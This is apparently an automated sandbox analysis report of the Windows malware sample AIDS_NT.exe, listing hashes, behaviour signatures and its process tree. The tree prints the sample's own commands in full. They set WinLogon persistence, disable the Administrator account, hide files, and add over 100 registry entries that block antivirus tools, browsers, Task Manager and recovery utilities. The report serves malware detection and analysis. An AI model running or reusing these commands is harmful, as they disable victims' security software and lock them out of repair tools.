Analysis
-
max time kernel
117s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 10:35
General
-
Target
AIDS_NT.exe
-
Size
924KB
-
MD5
14eefb80a0813abbf8710387a5383f08
-
SHA1
d3fa355cc1d184be20b441143fa34e4ae1a4bdb2
-
SHA256
61ee3bd82bed03dd0f3fb9bc9b76b7da972a90d3c12c8e4d5e967440a2f04c00
-
SHA512
a3174a80c47a02b6deed6eb390a999fa486f7a4cda7ab614d93589f614a60ba500aa8f42346e80cc53b7e1a5af0f0e515e4b014d23e5af90fabeae504f43f130
Score
10/10
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
-
Modifies system executable filetype association 2 TTPs 4 IoCs
-
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Disables RegEdit via registry modification
-
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Executes dropped EXE 1 IoCs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
-
Drops file in Windows directory 12 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 64 IoCs
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe"C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat" "2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell3⤵
- Modifies WinLogon for persistence
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell /d "explorer.exe, C:\Windows\AIDS_NT_Instructions.txt, C:\Windows\aids.bat, C:\Windows\42.exe, C:\Windows\1.bat"3⤵
- Modifies WinLogon for persistence
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f3⤵
- Sets desktop wallpaper using registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exenircmd win hide title "C:\Windows\system32\cmd.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\PkgMgr.bat +h +s +a +r3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\net.exenet user ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç /active:no3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç /active:no4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v HideFastUserSwitching /t REG_DWORD /d "1"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /f /v "DisallowRun" /t REG_DWORD /d "1"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MSASCui.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "msmpeng.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "msdt.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "ProcessHacker.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "spideragent.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "SbieSvc.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "SearchUI.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "8" /t REG_SZ /d "dwscanner.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "9" /t REG_SZ /d "aswEngSrv.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "10" /t REG_SZ /d "AvastSvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "11" /t REG_SZ /d "AvastUI.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "12" /t REG_SZ /d "AvastBrowserCrashHandler.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "13" /t REG_SZ /d "chrome.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "14" /t REG_SZ /d "VirtualBox.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "15" /t REG_SZ /d "CCleaner64.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "16" /t REG_SZ /d "CCleaner32.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "17" /t REG_SZ /d "CCleaner86.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "18" /t REG_SZ /d "CCleaner.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "19" /t REG_SZ /d "firefox.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "20" /t REG_SZ /d "taskmgr.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "21" /t REG_SZ /d "opera.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "22" /t REG_SZ /d "iexplore.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "23" /t REG_SZ /d "perfmon.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "24" /t REG_SZ /d "msconfig.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "25" /t REG_SZ /d "WUDFHost.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "26" /t REG_SZ /d "msconfig.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "27" /t REG_SZ /d "SecurityHealthSystray.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "28" /t REG_SZ /d "rstrui.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "29" /t REG_SZ /d "mcapexe.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "30" /t REG_SZ /d "McCSPServiceHost.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "31" /t REG_SZ /d "McInstruTrack.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "32" /t REG_SZ /d "McPvTray.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "33" /t REG_SZ /d "mcshield.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "34" /t REG_SZ /d "McUICnt.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "35" /t REG_SZ /d "MfeAVSvc.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "36" /t REG_SZ /d "mfefire.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "37" /t REG_SZ /d "mfevtps.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "38" /t REG_SZ /d "MMSSHOST.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "39" /t REG_SZ /d "ModuleCoreService.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "40" /t REG_SZ /d "control.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "41" /t REG_SZ /d "avp.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "42" /t REG_SZ /d "avpui.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "43" /t REG_SZ /d "kav.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "44" /t REG_SZ /d "vmware.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "45" /t REG_SZ /d "msinfo32.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "46" /t REG_SZ /d "RecoveryDrive.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "47" /t REG_SZ /d "dwscanner.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "48" /t REG_SZ /d "spideragent.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "49" /t REG_SZ /d "uTorrent.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "50" /t REG_SZ /d "firefox.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "51" /t REG_SZ /d "regedt32.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "52" /t REG_SZ /d "resmon.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "53" /t REG_SZ /d "Defender.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "54" /t REG_SZ /d "DefenderDaemon.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "55" /t REG_SZ /d "mbam.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "56" /t REG_SZ /d "mbamtray.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "57" /t REG_SZ /d "MBAMWsc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "58" /t REG_SZ /d "mbuns.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "59" /t REG_SZ /d "MbamPt.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "60" /t REG_SZ /d "MBAMService.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "61" /t REG_SZ /d "assistant.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "62" /t REG_SZ /d "malwarebytes_assistant.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "63" /t REG_SZ /d "ig.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "64" /t REG_SZ /d "browser.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "65" /t REG_SZ /d "am800.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "66" /t REG_SZ /d "TOTALCMD64.EXE" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "67" /t REG_SZ /d "TOTALCMD32.EXE" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "68" /t REG_SZ /d "TOTALCMD86.EXE" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "69" /t REG_SZ /d "WatchDog.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "70" /t REG_SZ /d "ProductAgentUI.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "71" /t REG_SZ /d "ProductAgentService.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "72" /t REG_SZ /d "DiscoverySrv.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "73" /t REG_SZ /d "BDSubWiz.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "74" /t REG_SZ /d "bdreinit.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "75" /t REG_SZ /d "agentpackage.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "76" /t REG_SZ /d "setuppackage.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "77" /t REG_SZ /d "7zFM.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "78" /t REG_SZ /d "procexp64.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "79" /t REG_SZ /d "procexp.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "80" /t REG_SZ /d "WinRAR.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "81" /t REG_SZ /d "BdVpnService.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "82" /t REG_SZ /d "BdVpnApp.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "83" /t REG_SZ /d "bdservicehost.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "84" /t REG_SZ /d "bdagent.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "85" /t REG_SZ /d "bdredline.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "86" /t REG_SZ /d "ekrn.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "87" /t REG_SZ /d "eguiProxy.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "88" /t REG_SZ /d "egui.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "89" /t REG_SZ /d "AvastNM.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "90" /t REG_SZ /d "AVGBrowserCrashHandler.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "91" /t REG_SZ /d "AVGBrowserCrashHandler64.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "92" /t REG_SZ /d "AVGUI.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "93" /t REG_SZ /d "AVGSvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "94" /t REG_SZ /d "aswEngSrv.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "95" /t REG_SZ /d "wsc_proxy.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "96" /t REG_SZ /d "am807.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "97" /t REG_SZ /d "artmoney.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "98" /t REG_SZ /d "chemax.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "99" /t REG_SZ /d "Cheat Engine.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "100" /t REG_SZ /d "aswidsagent.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "101" /t REG_SZ /d "AvastBrowserCrashHandler.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "102" /t REG_SZ /d "AvastBrowserCrashHandler64.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "103" /t REG_SZ /d "AvastBrowserCrashHandler32.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "104" /t REG_SZ /d "AvastBrowserCrashHandler86.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "105" /t REG_SZ /d "MSASCui.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "106" /t REG_SZ /d "msdt.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "107" /t REG_SZ /d "MRT.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "108" /t REG_SZ /d "msiexec.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "109" /t REG_SZ /d "msseces.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "110" /t REG_SZ /d "control.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "111" /t REG_SZ /d "mmc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "112" /t REG_SZ /d "opera_crashreporter.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "113" /t REG_SZ /d "opera_autoupdate.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "114" /t REG_SZ /d "opera.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "115" /t REG_SZ /d "MicrosoftEdge.exe" /f3⤵
-
